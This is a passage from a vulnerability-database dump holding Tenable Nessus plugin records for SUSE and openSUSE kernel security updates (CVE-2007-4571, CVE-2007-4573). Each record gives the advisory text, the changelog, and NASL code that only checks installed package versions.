extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-bigsmp / kernel-debug / kernel-default / kernel-kdump / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:45:27", "description": "This kernel update fixes the following security problems :\n\n - CVE-2007-4571: An information disclosure vulnerability\n in the ALSA driver can be exploited by local users to\n read sensitive data from the kernel memory.\n\n - CVE-2007-4573: It was possible for local user to become\n root by exploitable a bug in the IA32 system call\n emulation. This affects x86_64 platforms with kernel\n 2.4.x and 2.6.x before 2.6.22.7 only.\n\nand the following non security bugs :\n\n - supported.conf: Mark 8250 and 8250_pci as supported\n (only Xen kernels build them as modules) [#260686]\n\n - patches.fixes/bridge-module-get-put.patch: Module use\n count must be updated as bridges are created/destroyed\n [#267651]\n\n - patches.fixes/nfsv4-MAXNAME-fix.diff: knfsd: query\n filesystem for NFSv4 getattr of FATTR4_MAXNAME [#271803]\n\n - patches.fixes/sky2-tx-sum-resume.patch: sky2: fix\n transmit state on resume [#297132] [#326376]\n\n - patches.suse/reiserfs-add-reiserfs_error.diff:\n patches.suse/reiserfs-use-reiserfs_error.diff:\n patches.suse/reiserfs-buffer-info-for-balance.diff: Fix\n reiserfs_error() with NULL superblock calls [#299604]\n\n - patches.fixes/acpi_disable_C_states_in_suspend.patch:\n ACPI: disable lower idle C-states across suspend/resume\n [#302482]\n\n - kernel-syms.rpm: move the copies of the Modules.alias\n files from /lib/modules/... to /usr/src/linux-obj/... to\n avoid a file conflict between kernel-syms and other\n kernel-$flavor packages. The Modules.alias files in\n kernel-syms.rpm are intended for future use - [#307291]\n\n - patches.fixes/jffs2-fix-ACL-vs-mode-handling: Fix ACL\n vs. mode handling. [#310520]\n\n- patches.drivers/libata-sata_sil24-fix-IRQ-clearing-race-on-I RQ_WOC:\nsata_sil24: fix IRQ clearing race when PCIX_IRQ_WOC is used [#327536]\n\n - Update config files: Enabled CONFIG_DVB_PLUTO2 for i386\n since it's enabled everywhere else. [#327790]\n\n- patches.drivers/libata-pata_ali-fix-garbage-PCI-rev-value: p\nata_ali: fix garbage PCI rev value in ali_init_chipset() [#328422]\n\n - patches.apparmor/apparmor-lsm-fix.diff:\n apparmor_file_mmap function parameters mismatch\n [#328423]\n\n - patches.drivers/libata-HPA-off-by-one-horkage: Fix HPA\n handling regression [#329584]", "edition": 24, "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : kernel (kernel-4503)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4573", "CVE-2007-4571"], "modified": "2007-10-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-bigsmp", "cpe:/o:novell:opensuse:10.3", "p-cpe:/a:novell:opensuse:kernel-xenpae", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-default"], "id": "SUSE_KERNEL-4503.NASL", "href": "https://www.tenable.com/plugins/nessus/27299", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update kernel-4503.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27299);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-4571\", \"CVE-2007-4573\");\n\n script_name(english:\"openSUSE 10 Security Update : kernel (kernel-4503)\");\n script_summary(english:\"Check for the kernel-4503 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This kernel update fixes the following security problems :\n\n - CVE-2007-4571: An information disclosure vulnerability\n in the ALSA driver can be exploited by local users to\n read sensitive data from the kernel memory.\n\n - CVE-2007-4573: It was possible for local user to become\n root by exploitable a bug in the IA32 system call\n emulation. This affects x86_64 platforms with kernel\n 2.4.x and 2.6.x before 2.6.22.7 only.\n\nand the following non security bugs :\n\n - supported.conf: Mark 8250 and 8250_pci as supported\n (only Xen kernels build them as modules) [#260686]\n\n - patches.fixes/bridge-module-get-put.patch: Module use\n count must be updated as bridges are created/destroyed\n [#267651]\n\n - patches.fixes/nfsv4-MAXNAME-fix.diff: knfsd: query\n filesystem for NFSv4 getattr of FATTR4_MAXNAME [#271803]\n\n - patches.fixes/sky2-tx-sum-resume.patch: sky2: fix\n transmit state on resume [#297132] [#326376]\n\n - patches.suse/reiserfs-add-reiserfs_error.diff:\n patches.suse/reiserfs-use-reiserfs_error.diff:\n patches.suse/reiserfs-buffer-info-for-balance.diff: Fix\n reiserfs_error() with NULL superblock calls [#299604]\n\n - patches.fixes/acpi_disable_C_states_in_suspend.patch:\n ACPI: disable lower idle C-states across suspend/resume\n [#302482]\n\n - kernel-syms.rpm: move the copies of the Modules.alias\n files from /lib/modules/... to /usr/src/linux-obj/... to\n avoid a file conflict between kernel-syms and other\n kernel-$flavor packages. The Modules.alias files in\n kernel-syms.rpm are intended for future use - [#307291]\n\n - patches.fixes/jffs2-fix-ACL-vs-mode-handling: Fix ACL\n vs. mode handling. [#310520]\n\n- patches.drivers/libata-sata_sil24-fix-IRQ-clearing-race-on-I RQ_WOC:\nsata_sil24: fix IRQ clearing race when PCIX_IRQ_WOC is used [#327536]\n\n - Update config files: Enabled CONFIG_DVB_PLUTO2 for i386\n since it's enabled everywhere else. [#327790]\n\n- patches.drivers/libata-pata_ali-fix-garbage-PCI-rev-value: p\nata_ali: fix garbage PCI rev value in ali_init_chipset() [#328422]\n\n - patches.apparmor/apparmor-lsm-fix.diff:\n apparmor_file_mmap function parameters mismatch\n [#328423]\n\n - patches.drivers/libata-HPA-off-by-one-horkage: Fix HPA\n handling regression [#329584]\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-bigsmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xenpae\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"kernel-bigsmp-2.6.22.9-0.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"kernel-default-2.6.22.9-0.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"kernel-source-2.6.22.9-0.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"kernel-syms-2.6.22.9-0.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"kernel-xen-2.6.22.9-0.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"kernel-xenpae-2.6.22.9-0.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-bigsmp / kernel-default / kernel-source / kernel-syms / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:45:27", "description": "This kernel update fixes the following security problems :\n\n - It was possible for local user to become root by\n exploiting a bug in the IA32 system call emulation. This\n affects x86_64 platforms with kernel 2.4.x and 2.6.x\n before 2.6.22.7 only. (CVE-2007-4573)\n\n - An information disclosure vulnerability in the ALSA\n driver can be exploited by local users to read sensitive\n data from the kernel memory. (CVE-2007-4571)\n\nand the following non security bugs :\n\n - patches.xen/xen-blkback-cdrom: CDROM removable\n media-present attribute plus handling code [#159907]\n\n - patches.drivers/libata-add-pata_dma-kernel-parameter:\n libata: Add a drivers/ide style DMA disable [#229260]\n [#272786]\n\n - patches.drivers/libata-sata_via-kill-SATA_PATA_SHARING:\n sata_via: kill SATA_PATA_SHARING register handling\n [#254158] [#309069]\n\n - patches.drivers/libata-sata_via-add-PCI-IDs: sata_via:\n add PCI IDs [#254158] [#326647]\n\n - supported.conf: Marked 8250 and 8250_pci as supported\n (only Xen kernels build them as modules) [#260686]\n\n - patches.fixes/bridge-module-get-put.patch: Module use\n count must be updated as bridges are created/destroyed\n [#267651]\n\n - patches.fixes/iscsi-netware-fix: Linux Initiator hard\n hangs writing files to NetWare target [#286566]\n\n - patches.fixes/lockd-chroot-fix: Allow lockd to work\n reliably with applications in a chroot [#288376]\n [#305480]\n\n - add patches.fixes/x86_64-hangcheck_timer-fix.patch fix\n monotonic_clock() and hangcheck_timer [#291633]\n\n - patches.arch/sn_hwperf_cpuinfo_fix.diff: Correctly count\n CPU objects for SGI ia64/sn hwperf interface [#292240]\n\n - Extend reiserfs to properly support file systems up to\n 16 TiB [#294754]\n\n - patches.fixes/reiserfs-signedness-fixes.diff: reiserfs:\n fix usage of signed ints for block numbers\n\n - patches.fixes/reiserfs-fix-large-fs.diff: reiserfs:\n ignore s_bmap_nr on disk for file systems >= 8 TiB\n\n - patches.suse/ocfs2-06-per-resource-events.diff: Deliver\n events without a specified resource unconditionally.\n [#296606]\n\n - patches.fixes/proc-readdir-race-fix.patch: Fix the race\n in proc_pid_readdir [#297232]\n\n - patches.xen/xen3-patch-2.6.16.49-50: XEN: update to\n Linux 2.6.16.50 [#298719]\n\n - patches.fixes/pm-ordering-fix.patch: PM: Fix ACPI\n suspend / device suspend ordering [#302207]\n\n - patches.drivers/ibmvscsi-slave_configure.patch add\n\n ->slave_configure() to allow device restart [#304138]\n\n - patches.arch/ppc-power6-ebus-unique_location.patch\n Prevent bus_id collisions [#306482]\n\n - patches.xen/30-bit-field-booleans.patch: Fix packet loss\n in DomU xen netback driver [#306896]\n\n - config/i386/kdump: Enable ahci module [#308556]\n\n - update patches.drivers/ppc-power6-ehea.patch fix link\n state detection for bonding [#309553]\n\n - patches.drivers/ibmveth-fixup-pool_deactivate.patch\n patches.drivers/ibmveth-large-frames.patch\n patches.drivers/ibmveth-large-mtu.patch: fix serveral\n crashes when changing ibmveth sysfs values [#326164]\n\n -\n patches.drivers/libata-sata_sil24-fix-IRQ-clearing-race-\n on-I RQ_WOC: sata_sil24: fix IRQ clearing race when\n PCIX_IRQ_WOC is used [#327536]\n\n - update patches.drivers/ibmvscsis.patch set blocksize to\n PAGE_CACHE_SIZE to fix flood of bio allocation\n warnings/failures [#328219]", "edition": 23, "published": "2012-05-17T00:00:00", "title": "SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 4472)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4573", "CVE-2007-4571"], "modified": "2012-05-17T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_KERNEL-4472.NASL", "href": "https://www.tenable.com/plugins/nessus/59124", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59124);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-4571\", \"CVE-2007-4573\");\n\n script_name(english:\"SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 4472)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This kernel update fixes the following security problems :\n\n - It was possible for local user to become root by\n exploiting a bug in the IA32 system call emulation. This\n affects x86_64 platforms with kernel 2.4.x and 2.6.x\n before 2.6.22.7 only. (CVE-2007-4573)\n\n - An information disclosure vulnerability in the ALSA\n driver can be exploited by local users to read sensitive\n data from the kernel memory. (CVE-2007-4571)\n\nand the following non security bugs :\n\n - patches.xen/xen-blkback-cdrom: CDROM removable\n media-present attribute plus handling code [#159907]\n\n - patches.drivers/libata-add-pata_dma-kernel-parameter:\n libata: Add a drivers/ide style DMA disable [#229260]\n [#272786]\n\n - patches.drivers/libata-sata_via-kill-SATA_PATA_SHARING:\n sata_via: kill SATA_PATA_SHARING register handling\n [#254158] [#309069]\n\n - patches.drivers/libata-sata_via-add-PCI-IDs: sata_via:\n add PCI IDs [#254158] [#326647]\n\n - supported.conf: Marked 8250 and 8250_pci as supported\n (only Xen kernels build them as modules) [#260686]\n\n - patches.fixes/bridge-module-get-put.patch: Module use\n count must be updated as bridges are created/destroyed\n [#267651]\n\n - patches.fixes/iscsi-netware-fix: Linux Initiator hard\n hangs writing files to NetWare target [#286566]\n\n - patches.fixes/lockd-chroot-fix: Allow lockd to work\n reliably with applications in a chroot [#288376]\n [#305480]\n\n - add patches.fixes/x86_64-hangcheck_timer-fix.patch fix\n monotonic_clock() and hangcheck_timer [#291633]\n\n - patches.arch/sn_hwperf_cpuinfo_fix.diff: Correctly count\n CPU objects for SGI ia64/sn hwperf interface [#292240]\n\n - Extend reiserfs to properly support file systems up to\n 16 TiB [#294754]\n\n - patches.fixes/reiserfs-signedness-fixes.diff: reiserfs:\n fix usage of signed ints for block numbers\n\n - patches.fixes/reiserfs-fix-large-fs.diff: reiserfs:\n ignore s_bmap_nr on disk for file systems >= 8 TiB\n\n - patches.suse/ocfs2-06-per-resource-events.diff: Deliver\n events without a specified resource unconditionally.\n [#296606]\n\n - patches.fixes/proc-readdir-race-fix.patch: Fix the race\n in proc_pid_readdir [#297232]\n\n - patches.xen/xen3-patch-2.6.16.49-50: XEN: update to\n Linux 2.6.16.50 [#298719]\n\n - patches.fixes/pm-ordering-fix.patch: PM: Fix ACPI\n suspend / device suspend ordering [#302207]\n\n - patches.drivers/ibmvscsi-slave_configure.patch add\n\n ->slave_configure() to allow device restart [#304138]\n\n - patches.arch/ppc-power6-ebus-unique_location.patch\n Prevent bus_id collisions [#306482]\n\n - patches.xen/30-bit-field-booleans.patch: Fix packet loss\n in DomU xen netback driver [#306896]\n\n - config/i386/kdump: Enable ahci module [#308556]\n\n - update patches.drivers/ppc-power6-ehea.patch fix link\n state detection for bonding [#309553]\n\n - patches.drivers/ibmveth-fixup-pool_deactivate.patch\n patches.drivers/ibmveth-large-frames.patch\n patches.drivers/ibmveth-large-mtu.patch: fix serveral\n crashes when changing ibmveth sysfs values [#326164]\n\n -\n patches.drivers/libata-sata_sil24-fix-IRQ-clearing-race-\n on-I RQ_WOC: sata_sil24: fix IRQ clearing race when\n PCIX_IRQ_WOC is used [#327536]\n\n - update patches.drivers/ibmvscsis.patch set blocksize to\n PAGE_CACHE_SIZE to fix flood of bio allocation\n warnings/failures [#328219]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-4571.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-4573.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 4472.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"kernel-default-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"kernel-smp-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"kernel-source-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"kernel-syms-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"kernel-debug-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"kernel-default-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"kernel-kdump-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"kernel-smp-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"kernel-source-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"kernel-syms-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-2.6.16.53-0.16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:45:27", "description": "This kernel update fixes the following security problems :\n\n - It was possible for local user to become root by\n exploiting a bug in the IA32 system call emulation. This\n affects x86_64 platforms with kernel 2.4.x and 2.6.x\n before 2.6.22.7 only. (CVE-2007-4573)\n\n - An information disclosure vulnerability in the ALSA\n driver can be exploited by local users to read sensitive\n data from the kernel memory. (CVE-2007-4571)\n\nand the following non security bugs :\n\n - patches.xen/xen-blkback-cdrom: CDROM removable\n media-present attribute plus handling code [#159907]\n\n - patches.drivers/libata-add-pata_dma-kernel-parameter:\n libata: Add a drivers/ide style DMA disable [#229260]\n [#272786]\n\n - patches.drivers/libata-sata_via-kill-SATA_PATA_SHARING:\n sata_via: kill SATA_PATA_SHARING register handling\n [#254158] [#309069]\n\n - patches.drivers/libata-sata_via-add-PCI-IDs: sata_via:\n add PCI IDs [#254158] [#326647]\n\n - supported.conf: Marked 8250 and 8250_pci as supported\n (only Xen kernels build them as modules) [#260686]\n\n - patches.fixes/bridge-module-get-put.patch: Module use\n count must be updated as bridges are created/destroyed\n [#267651]\n\n - patches.fixes/iscsi-netware-fix: Linux Initiator hard\n hangs writing files to NetWare target [#286566]\n\n - patches.fixes/lockd-chroot-fix: Allow lockd to work\n reliably with applications in a chroot [#288376]\n [#305480]\n\n - add patches.fixes/x86_64-hangcheck_timer-fix.patch fix\n monotonic_clock() and hangcheck_timer [#291633]\n\n - patches.arch/sn_hwperf_cpuinfo_fix.diff: Correctly count\n CPU objects for SGI ia64/sn hwperf interface [#292240]\n\n - Extend reiserfs to properly support file systems up to\n 16 TiB [#294754]\n\n - patches.fixes/reiserfs-signedness-fixes.diff: reiserfs:\n fix usage of signed ints for block numbers\n\n - patches.fixes/reiserfs-fix-large-fs.diff: reiserfs:\n ignore s_bmap_nr on disk for file systems >= 8 TiB\n\n - patches.suse/ocfs2-06-per-resource-events.diff: Deliver\n events without a specified resource unconditionally.\n [#296606]\n\n - patches.fixes/proc-readdir-race-fix.patch: Fix the race\n in proc_pid_readdir [#297232]\n\n - patches.xen/xen3-patch-2.6.16.49-50: XEN: update to\n Linux 2.6.16.50 [#298719]\n\n - patches.fixes/pm-ordering-fix.patch: PM: Fix ACPI\n suspend / device suspend ordering [#302207]\n\n - patches.drivers/ibmvscsi-slave_configure.patch add\n\n ->slave_configure() to allow device restart [#304138]\n\n - patches.arch/ppc-power6-ebus-unique_location.patch\n Prevent bus_id collisions [#306482]\n\n - patches.xen/30-bit-field-booleans.patch: Fix packet loss\n in DomU xen netback driver [#306896]\n\n - config/i386/kdump: Enable ahci module [#308556]\n\n - update patches.drivers/ppc-power6-ehea.patch fix link\n state detection for bonding [#309553]\n\n - patches.drivers/ibmveth-fixup-pool_deactivate.patch\n patches.drivers/ibmveth-large-frames.patch\n patches.drivers/ibmveth-large-mtu.patch: fix serveral\n crashes when changing ibmveth sysfs values [#326164]\n\n -\n patches.drivers/libata-sata_sil24-fix-IRQ-clearing-race-\n on-I RQ_WOC: sata_sil24: fix IRQ clearing race when\n PCIX_IRQ_WOC is used [#327536]\n\n - update patches.drivers/ibmvscsis.patch set blocksize to\n PAGE_CACHE_SIZE to fix flood of bio allocation\n warnings/failures [#328219]\n\nFixes for S/390 :\n\n - IBM Patchcluster 17 [#330036]\n\n - Problem-ID: 38085 - zfcp: zfcp_scsi_eh_abort_handler or\n zfcp_scsi_eh_device_reset_handler hanging after CHPID\n off/on\n\n - Problem-ID: 38491 - zfcp: Error messages when LUN 0 is\n present\n\n - Problem-ID: 37390 - zcrypt: fix PCIXCC/CEX2C error\n recovery [#306056]\n\n - Problem-ID: 38500 - kernel: too few page cache pages in\n state volatile\n\n - Problem-ID: 38634 - qeth: crash during reboot after\n failing online setting\n\n - Problem-ID: 38927 - kernel: shared memory may not be\n volatile\n\n - Problem-ID: 39069 - cio: Disable channel path\n measurements on shutdown/reboot\n\n - Problem-ID: 27787 - qeth: recognize 'exclusively\n used'-RC from Hydra3\n\n - Problem-ID: 38330 - qeth: make qeth driver loadable\n without ipv6 module\n\n For further description of the named Problem-IDs, please\n look to\n http://www-128.ibm.com/developerworks/linux/linux390/oct\n ober 2005_recommended.html", "edition": 24, "published": "2007-12-13T00:00:00", "title": "SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 4471)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4573", "CVE-2007-4571"], "modified": "2007-12-13T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_KERNEL-4471.NASL", "href": "https://www.tenable.com/plugins/nessus/29488", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29488);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-4571\", \"CVE-2007-4573\");\n\n script_name(english:\"SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 4471)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This kernel update fixes the following security problems :\n\n - It was possible for local user to become root by\n exploiting a bug in the IA32 system call emulation. This\n affects x86_64 platforms with kernel 2.4.x and 2.6.x\n before 2.6.22.7 only. (CVE-2007-4573)\n\n - An information disclosure vulnerability in the ALSA\n driver can be exploited by local users to read sensitive\n data from the kernel memory. (CVE-2007-4571)\n\nand the following non security bugs :\n\n - patches.xen/xen-blkback-cdrom: CDROM removable\n media-present attribute plus handling code [#159907]\n\n - patches.drivers/libata-add-pata_dma-kernel-parameter:\n libata: Add a drivers/ide style DMA disable [#229260]\n [#272786]\n\n - patches.drivers/libata-sata_via-kill-SATA_PATA_SHARING:\n sata_via: kill SATA_PATA_SHARING register handling\n [#254158] [#309069]\n\n - patches.drivers/libata-sata_via-add-PCI-IDs: sata_via:\n add PCI IDs [#254158] [#326647]\n\n - supported.conf: Marked 8250 and 8250_pci as supported\n (only Xen kernels build them as modules) [#260686]\n\n - patches.fixes/bridge-module-get-put.patch: Module use\n count must be updated as bridges are created/destroyed\n [#267651]\n\n - patches.fixes/iscsi-netware-fix: Linux Initiator hard\n hangs writing files to NetWare target [#286566]\n\n - patches.fixes/lockd-chroot-fix: Allow lockd to work\n reliably with applications in a chroot [#288376]\n [#305480]\n\n - add patches.fixes/x86_64-hangcheck_timer-fix.patch fix\n monotonic_clock() and hangcheck_timer [#291633]\n\n - patches.arch/sn_hwperf_cpuinfo_fix.diff: Correctly count\n CPU objects for SGI ia64/sn hwperf interface [#292240]\n\n - Extend reiserfs to properly support file systems up to\n 16 TiB [#294754]\n\n - patches.fixes/reiserfs-signedness-fixes.diff: reiserfs:\n fix usage of signed ints for block numbers\n\n - patches.fixes/reiserfs-fix-large-fs.diff: reiserfs:\n ignore s_bmap_nr on disk for file systems >= 8 TiB\n\n - patches.suse/ocfs2-06-per-resource-events.diff: Deliver\n events without a specified resource unconditionally.\n [#296606]\n\n - patches.fixes/proc-readdir-race-fix.patch: Fix the race\n in proc_pid_readdir [#297232]\n\n - patches.xen/xen3-patch-2.6.16.49-50: XEN: update to\n Linux 2.6.16.50 [#298719]\n\n - patches.fixes/pm-ordering-fix.patch: PM: Fix ACPI\n suspend / device suspend ordering [#302207]\n\n - patches.drivers/ibmvscsi-slave_configure.patch add\n\n ->slave_configure() to allow device restart [#304138]\n\n - patches.arch/ppc-power6-ebus-unique_location.patch\n Prevent bus_id collisions [#306482]\n\n - patches.xen/30-bit-field-booleans.patch: Fix packet loss\n in DomU xen netback driver [#306896]\n\n - config/i386/kdump: Enable ahci module [#308556]\n\n - update patches.drivers/ppc-power6-ehea.patch fix link\n state detection for bonding [#309553]\n\n - patches.drivers/ibmveth-fixup-pool_deactivate.patch\n patches.drivers/ibmveth-large-frames.patch\n patches.drivers/ibmveth-large-mtu.patch: fix serveral\n crashes when changing ibmveth sysfs values [#326164]\n\n -\n patches.drivers/libata-sata_sil24-fix-IRQ-clearing-race-\n on-I RQ_WOC: sata_sil24: fix IRQ clearing race when\n PCIX_IRQ_WOC is used [#327536]\n\n - update patches.drivers/ibmvscsis.patch set blocksize to\n PAGE_CACHE_SIZE to fix flood of bio allocation\n warnings/failures [#328219]\n\nFixes for S/390 :\n\n - IBM Patchcluster 17 [#330036]\n\n - Problem-ID: 38085 - zfcp: zfcp_scsi_eh_abort_handler or\n zfcp_scsi_eh_device_reset_handler hanging after CHPID\n 